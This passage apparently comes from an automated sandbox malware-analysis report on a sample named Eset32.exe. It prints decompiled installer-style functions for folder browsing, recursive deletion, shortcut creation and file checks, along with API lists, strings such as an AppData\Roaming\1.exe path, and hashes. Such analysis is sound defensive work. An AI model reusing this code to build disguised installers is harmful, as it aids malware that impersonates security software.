									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x4ab049
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a880 == _t158) {
									E00404566();
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == 0x435400) {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                          0x0040460d
                                                          0x00404613
                                                          0x00404619
                                                          0x00404626
                                                          0x00404634
                                                          0x00404637
                                                          0x0040463f
                                                          0x00404645
                                                          0x00404645
                                                          0x00404651
                                                          0x00404654
                                                          0x004046c2
                                                          0x004046c9
                                                          0x004047a0
                                                          0x004047a7
                                                          0x004047b6
                                                          0x004047b6
                                                          0x004047ba
                                                          0x004047c4
                                                          0x004047d1
                                                          0x004047d3
                                                          0x004047d3
                                                          0x004047e1
                                                          0x004047e8
                                                          0x004047ef
                                                          0x004047f2
                                                          0x00404829
                                                          0x0040482b
                                                          0x00404831
                                                          0x00404836
                                                          0x0040483a
                                                          0x0040483c
                                                          0x0040483c
                                                          0x00404858
                                                          0x00000000
                                                          0x0040485a
                                                          0x0040485d
                                                          0x0040486b
                                                          0x00404871
                                                          0x00404872
                                                          0x00404875
                                                          0x00404878
                                                          0x00000000
                                                          0x00404878
                                                          0x004047f4
                                                          0x004047f6
                                                          0x004047fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004047fc
                                                          0x004047fc
                                                          0x00404809
                                                          0x0040480e
                                                          0x00000000
                                                          0x00000000
                                                          0x00404812
                                                          0x00404814
                                                          0x00404814
                                                          0x0040481c
                                                          0x0040481e
                                                          0x00404821
                                                          0x00404824
                                                          0x00404827
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404827
                                                          0x00404884
                                                          0x0040488e
                                                          0x00404891
                                                          0x00404894
                                                          0x0040489b
                                                          0x0040489b
                                                          0x0040489d
                                                          0x0040489d
                                                          0x004048a2
                                                          0x004048a4
                                                          0x004048ac
                                                          0x004048b3
                                                          0x004048b5
                                                          0x004048c0
                                                          0x004048c0
                                                          0x004048b5
                                                          0x004048c7
                                                          0x004048d0
                                                          0x004048da
                                                          0x004048e2
                                                          0x004048fd
                                                          0x004048e4
                                                          0x004048ed
                                                          0x004048ed
                                                          0x004048e2
                                                          0x00404902
                                                          0x00404907
                                                          0x0040490c
                                                          0x00404915
                                                          0x00404915
                                                          0x0040491e
                                                          0x00404920
                                                          0x00404920
                                                          0x0040492c
                                                          0x00404934
                                                          0x0040493e
                                                          0x0040493e
                                                          0x00404943
                                                          0x00000000
                                                          0x00404943
                                                          0x004047f2
                                                          0x004047a9
                                                          0x004047b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004047b0
                                                          0x004046cf
                                                          0x004046d8
                                                          0x004046f2
                                                          0x004046f7
                                                          0x00404701
                                                          0x00404708
                                                          0x00404714
                                                          0x00404717
                                                          0x0040471a
                                                          0x00404721
                                                          0x00404729
                                                          0x0040472c
                                                          0x00404730
                                                          0x00404737
                                                          0x0040473f
                                                          0x00404799
                                                          0x00404741
                                                          0x00404742
                                                          0x00404749
                                                          0x00404753
                                                          0x0040475b
                                                          0x00404768
                                                          0x0040477c
                                                          0x00404780
                                                          0x00404780
                                                          0x0040477c
                                                          0x00404785
                                                          0x00404792
                                                          0x00404792
                                                          0x0040473f
                                                          0x00000000
                                                          0x004046f7
                                                          0x004046e5
                                                          0x00000000
                                                          0x00000000
                                                          0x004046eb
                                                          0x00000000
                                                          0x00404656
                                                          0x00404663
                                                          0x0040466c
                                                          0x00404679
                                                          0x00404679
                                                          0x00404680
                                                          0x00404686
                                                          0x0040468f
                                                          0x00404692
                                                          0x00404695
                                                          0x0040469d
                                                          0x004046a0
                                                          0x004046a3
                                                          0x004046a9
                                                          0x004046b0
                                                          0x004046b7
                                                          0x00404949
                                                          0x0040495b
                                                          0x004046bd
                                                          0x004046c0
                                                          0x00000000
                                                          0x004046c0
                                                          0x004046b7

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 0040465C
                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,0042A890,00000000,?,?), ref: 00404774
                                                          • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Roaming\1.exe), ref: 00404780
                                                          • SetDlgItemTextA.USER32 ref: 00404792
                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Roaming\1.exe
                                                          • API String ID: 2624150263-541473819
                                                          • Opcode ID: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                          • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                          • Opcode Fuzzy Hash: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                          • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                          0x004058c9
                                                          0x004058ce
                                                          0x004058d7
                                                          0x004058da
                                                          0x004058e2
                                                          0x004058e5
                                                          0x004058e8
                                                          0x004058f0
                                                          0x004058f2
                                                          0x004058f3
                                                          0x00000000
                                                          0x004058f3
                                                          0x004058fe
                                                          0x00405901
                                                          0x00405901
                                                          0x00405901
                                                          0x00405905
                                                          0x00405918
                                                          0x0040591f
                                                          0x00405924
                                                          0x00405928
                                                          0x00405938
                                                          0x0040592a
                                                          0x00405930
                                                          0x00405930
                                                          0x0040593d
                                                          0x00405940
                                                          0x0040594b
                                                          0x00405951
                                                          0x00405956
                                                          0x00405966
                                                          0x00405968
                                                          0x0040596e
                                                          0x00405971
                                                          0x00405974
                                                          0x00405a2c
                                                          0x00405a2c
                                                          0x00405a30
                                                          0x00405a32
                                                          0x00405a32
                                                          0x00405a32
                                                          0x00405a32
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040597a
                                                          0x0040597a
                                                          0x00405983
                                                          0x00405989
                                                          0x0040598e
                                                          0x00405991
                                                          0x00405993
                                                          0x00405997
                                                          0x00405999
                                                          0x00405999
                                                          0x00405997
                                                          0x0040599c
                                                          0x0040599f
                                                          0x004059b2
                                                          0x004059b4
                                                          0x004059b9
                                                          0x004059c0
                                                          0x004059db
                                                          0x004059e0
                                                          0x004059e2
                                                          0x00405a06
                                                          0x004059e4
                                                          0x004059e4
                                                          0x004059e7
                                                          0x004059fb
                                                          0x004059e9
                                                          0x004059ec
                                                          0x004059f4
                                                          0x004059f4
                                                          0x004059e7
                                                          0x004059c2
                                                          0x004059c8
                                                          0x004059ca
                                                          0x004059d0
                                                          0x004059d0
                                                          0x004059ca
                                                          0x00000000
                                                          0x004059c0
                                                          0x004059a1
                                                          0x004059a4
                                                          0x004059a6
                                                          0x00000000
                                                          0x00000000
                                                          0x004059a8
                                                          0x004059aa
                                                          0x00000000
                                                          0x00000000
                                                          0x004059ac
                                                          0x004059b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a0b
                                                          0x00405a15
                                                          0x00405a1b
                                                          0x00405a1b
                                                          0x00405a26
                                                          0x00000000
                                                          0x00405a26
                                                          0x00405942
                                                          0x00405949
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405907
                                                          0x00405907
                                                          0x00405909
                                                          0x00405a36
                                                          0x00405a38
                                                          0x00405a3b
                                                          0x00405a8c
                                                          0x00405a8c
                                                          0x00405a8c
                                                          0x00405a3d
                                                          0x00405a40
                                                          0x00405a4b
                                                          0x00405a50
                                                          0x00405a52
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a55
                                                          0x00405a61
                                                          0x00405a66
                                                          0x00405a68
                                                          0x00000000
                                                          0x00405a83
                                                          0x00405a6a
                                                          0x00405a6d
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a72
                                                          0x00000000
                                                          0x00405a79
                                                          0x00405a42
                                                          0x00405a42
                                                          0x00000000
                                                          0x00405a42
                                                          0x0040590f
                                                          0x00405912
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405912

                                                          APIs
                                                          • DeleteFileA.KERNEL32(?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                          • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                          • \*.*, xrefs: 0040592A
                                                          • "C:\Users\user\Desktop\Eset32.exe" , xrefs: 004058BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-2193212254
                                                          • Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                          • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                          • Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                          • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Roaming");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                          0x00402174
                                                          0x0040217e
                                                          0x00402188
                                                          0x00402195
                                                          0x004021a0
                                                          0x004021a3
                                                          0x004021bd
                                                          0x004021c3
                                                          0x004021c9
                                                          0x004021cc
                                                          0x004021d6
                                                          0x004021da
                                                          0x004021da
                                                          0x004021df
                                                          0x004021f0
                                                          0x004021f8
                                                          0x004022d4
                                                          0x004022d4
                                                          0x004022db
                                                          0x004021fe
                                                          0x004021fe
                                                          0x0040220d
                                                          0x00402211
                                                          0x00402214
                                                          0x0040221a
                                                          0x00402228
                                                          0x0040222b
                                                          0x0040222d
                                                          0x00402238
                                                          0x00402238
                                                          0x0040223d
                                                          0x0040223f
                                                          0x00402246
                                                          0x00402246
                                                          0x00402249
                                                          0x00402252
                                                          0x00402255
                                                          0x0040225a
                                                          0x0040225c
                                                          0x00402269
                                                          0x00402269
                                                          0x0040226c
                                                          0x00402278
                                                          0x0040227b
                                                          0x00402284
                                                          0x0040228a
                                                          0x00402291
                                                          0x004022aa
                                                          0x004022ac
                                                          0x004022ba
                                                          0x004022ba
                                                          0x004022aa
                                                          0x004022bd
                                                          0x004022c3
                                                          0x004022c3
                                                          0x004022c6
                                                          0x004022cc
                                                          0x004022d2
                                                          0x004022e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004022d2
                                                          0x004022dd
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00402230
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 123533781-3453768385
                                                          • Opcode ID: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                          • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                          • Opcode Fuzzy Hash: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                          • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}




                                                          0x00406476
                                                          0x0040647f
                                                          0x00000000
                                                          0x0040648c
                                                          0x00406482
                                                          0x00000000

                                                          APIs
                                                          • FindFirstFileA.KERNEL32(76DDFA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                          • FindClose.KERNEL32(00000000), ref: 00406482
